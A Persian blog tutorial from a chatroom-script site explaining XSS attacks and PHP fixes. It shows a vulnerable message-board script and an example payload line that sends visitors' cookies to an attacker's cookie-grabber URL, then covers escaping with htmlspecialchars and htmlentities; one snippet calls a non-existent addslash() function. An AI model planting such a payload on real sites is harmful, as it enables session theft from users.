سری 3 آموزش های امنیتی چت روم

گلریزوب

مرجع اسکریپت و کد نویسی

محل نمایش تبلیغات شما محل نمایش تبلیغات شما محل نمایش تبلیغات شما محل نمایش تبلیغات شما

میزکار کاربری
Panel

عضویت سریع
نام کاربری
رمز عبور
تکرار رمز
ایمیل
کد تصویری
ورود کاربران
نام کاربری
رمز عبور

محصولات پر بازدید
Favorite Posts

لینک های سایت
Links

صفحات جداگانه
Extra Pages

آخرین محصولات
Recently Posts

آخرین نظرات کاربران
Recently Comments

love moon
love moon درتاریخ 1398/1/27 گفته :

سلام ببخشیدا ولی چرا ست درجه ای که من ساختمو به نام خودتون میزنید؟
زشته
راضی به اینکارتون نبودم خدایی نمیگذرم ازتون
پاسخ:سلام.شرمنده رسیدگی شد.  درجات به نام سایت زده نشده فقط جهت بروز رسانی سایت گذاشته شده .

مشتی
مشتی درتاریخ 1398/1/21 گفته :
تنها درجه که باهاش حال کردم همینه تاجشم هست
داداش اگ ممکنه درجه هایی که میزاری تاجم باشه باهاشون
مهدی تهرانی
مهدی تهرانی درتاریخ 1398/1/21 گفته :
با سلام خدمت دوستان
اسکریپ گلستان طرحه که توسط بست طرح ویرایش شده بودو باگ گیری که فارسی دیزاین امکانات زده روش بدون باگ نیست امنیتش قابل قبوله
اسکریپایی که تست کردم و پیشنهاد میکنم
اسکریپ لوکس طرح .ورژن 5اس تی طرح که همون لوکس طرحه والفا طرح ورژن یک که پخش کرده مال طرح پردازه اونم خوبه
الفا طرح هر پستی میرم تو نظر دادی داداش خیلی حوصله داری بیا خودم اسکریپتو بخرم خخخخ :):)
mohammad
mohammad درتاریخ 1398/1/19 گفته :
دوست عزیز لطفا جهت نصب و پشتیبانی با آیدی مدیریت در تاس باشید God_Corps@

0014168134

Alphatarh.ir
navid
navid درتاریخ 1398/1/19 گفته :
سلام. دوستان این اسکریپت رو نصب کردم متاسفانه هک شدم و بخش پروفایل اربریش وپنل مدیریتیش مشکل داره، اگر دنبال بکاپ درست حسابی هستید پیشنهاد میکنم از آلفا طرح خرید کنید. God_Corps آیدی مدیریتش
شماره تماس 09014168134

AlphaTarh.IR
آخرین ارسال های تالار گفتمان
هر آنچه که در انجمن در حال رخ داد است !

http://s5.picofile.com/file/8163781500/%DA%A9%D8%A7%D9%88%D8%B1_%D9%BE%D8%B3%D8%AA.png 

در این پست شما را با نحوه رخ دادن حملات xss آشنا می کنم./

این حملات زمانی رخ می دهد که یک سایت کد مخرب از کاربر دریافت کند و این کد از طریق این سایت در کامپیوتر قربانی مورد پردازش قرار گیرد. در واقع نفوذگر کد مخرب خود را که بر پایه دستورات html,JavaScript,Css هست را به سایت آسیب پذیر وارد کرده و سایت بدون هیچ فیلتر و یا پردازش ورودی این کد را بر روی کامپیوتر قربانی اجرا می کند./ این روش بیشتر برروی نفوذ از طریق کاربران تمرکز دارد./

این حمله از اعتماد یک کاربر به سایت سوء استفاده می شود و بر اساس همین اعتماد کدهای تزریق شده برروی کامپیوتر قربانی اجرا شده و این کدها می توانند هویت این کاربر را نزد نفوذگر افشا کنند./

حملات xss به صورت مختلفی پایه گذاری می شوند:
- فرستان یک لینک به کاربران مجاز: در این روش نفوذگر یک لینک را به کاربر ارسال می نماید و کاربر را ترغیب به رفتن به این لینک می نماید که متاسفانه پس از کلیک کد برروی سیستم قربانی اجرا می شود./

- اجرای کد توسط سایت مورد اعتماد کاربر که از آن بازدید می نماید: ممکن است شما نیز به دام این حمله افتاده باشید و پس از مشاهده یک پیغام و یا پست در سایت مورد علاقه خود مورد حمله قرار گرفته باشید. معمولا در تالارهایی که امکان استفاده از کدهای جاوا و html وجود دارد این نوع حمله قابل مشاهده است.

- کدهای مخرب ارسال شده توسط یک کاربر برای دیگر کاربران: در طول روز با سایت های زیادی بر خورد می کنید که ممکن است در هرکدام از این سایت ها امکان ارسال نظرات و پیام برای شما میسر باشد. حال اگر این پیام بدون هیچ کنترل و فیلتر مورد پردازش قرار گیرد نتیجه چیست؟؟؟ بله قطعا فاجعه برای کاربرانی که به این سایت اعتماد کرده اند و ممکن است تمامی اطلاعاتشان در خطر قرار گیرد.

کد زیر را در نظر بگیرید:

 

 <?php
if (isset($_POST['message'])){
   file_put_contents('board.txt',"{$_POST['message']}<hr/>",FILE_APPEND);
}
$messages=file_get_contents('board.txt');
echo $messages;
?> 

 

در این مثال متن گرفته شده از کاربر بدون هیچ پردازشی در فایل board.txt قرار گرفت تا برای کاربران نمایش داده شود.
حال اگر نفوذگر کد زیر را وارد نماید:

 

<script>document.location='http://silentDi3.co.cc/cookieGraber.php?cookies='+document.cookie</script>

 

نتیجه آن می شود که هرکاربری مجاز سایت از این نظر و این قسمت مشاهده نماید کوکی مورد استفاده این کاربر برای نفوذگر ارسال می شود./

 

 

---------------

حالا نحوه ی پچ کردن باگ xss رو با هم بررسی میکنیم.

همونطور که توضیح دادم این باگ عموما بر اثر بی توجهی و عدم بررسی ورودی ها رخ می دهد./ حالا اگه ما ورودی ها رو چک کنیم دیگه جای هیچ مشکلی نمی مونه./ کد زیر را در نظر بگیرید:

 

 <?php
$temp = $_GET['search'];
echo $temp
?> 

 

همانطور که مشاهده می کنید این یک کد آسیب پذیر به باگ xss است./ در زیر به روش های پچ این باگ می پردازیم.

1- استفاده از تابع addslash() : این تابع یک اسلش به ورودی های مشکوک به این حمله اضافه می کند( مانند: ',",...)

 

 <?php
$temp=addslash($_GET['search']);
echo $temp;
?> 

 

این روش یک روش معمول و پر استفاده می باشد اما ایمن نست و به راحتی قابل دور زدن است.!

2- استفاده از تابع htmlspecialchars() : کار این تابع این است که تمامی کاراکتر های استاندارد زبان html را به کد شده آن تبدیل می کند که دقیقا همان کاراکتر ها را در خروجی نمایش می دهد./

 

 <?php
$temp=htmlspecialchars($_GET['search']);
echo $temp;
?> 

 

این روش می تواند روش موثری در برابر این نوع حملات باشد.

3- استفاده از تابع htmlentities() : این تابع نیز دقیقا مانند تابع بالا عمل کرده و از عملکرد مناسب تر و دقیقتری برخوردار است:

 

 <?php
$temp=htmlentities($_GET['search']);
echo $temp;
?> 

 


4- سایر روش های جلوگیری: این روش ها بستگی به خلاقیت برنامه نویس دارد و اینکه از کدام روشها استفاده نماید./

 


طراحی چت روم

دسته : نکات و دستورات چت روم , ,
می پسندم نمی پسندم
تاریخ : جمعه 24 / 10 / 1393 ساعت : 16:18
نظرات
نظرات مرتبط با این پست
برای دیدن نظرات بیشتر روی شماره صفحات در زیر کلیک کنید
نام
آدرس ایمیل
وب سایت/بلاگ
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

آپلود عکس دلخواه:







درباره سایت
About Us

سلام دوستان گلم خوش امدید لحظات خوشی را برای شما ارزومند هستیم امیدوارم از مطالب ما استفادهی کافی رو برده باشید
دسترسی آسان
Easy Access
آمار سایت
Statistics
تعداد مطالب : 2035
تعداد نظرات : 3893
تعداد کاربران : 1641
امروز :
تعداد اعضای سایت : 1641
تعداد اعضای آنلاین : 6
بازدید امروز : 1958
بازدید دیروز : 3895
بازدید هفته : 31492
بازدید ماه : 141309
بازدید سال : 881900
بازدید کل : 10640980
نویسندگان
Author
محصولات تصادفی
Suggest Posts
امکانات وب
Codes

خبرنامه وب سایت: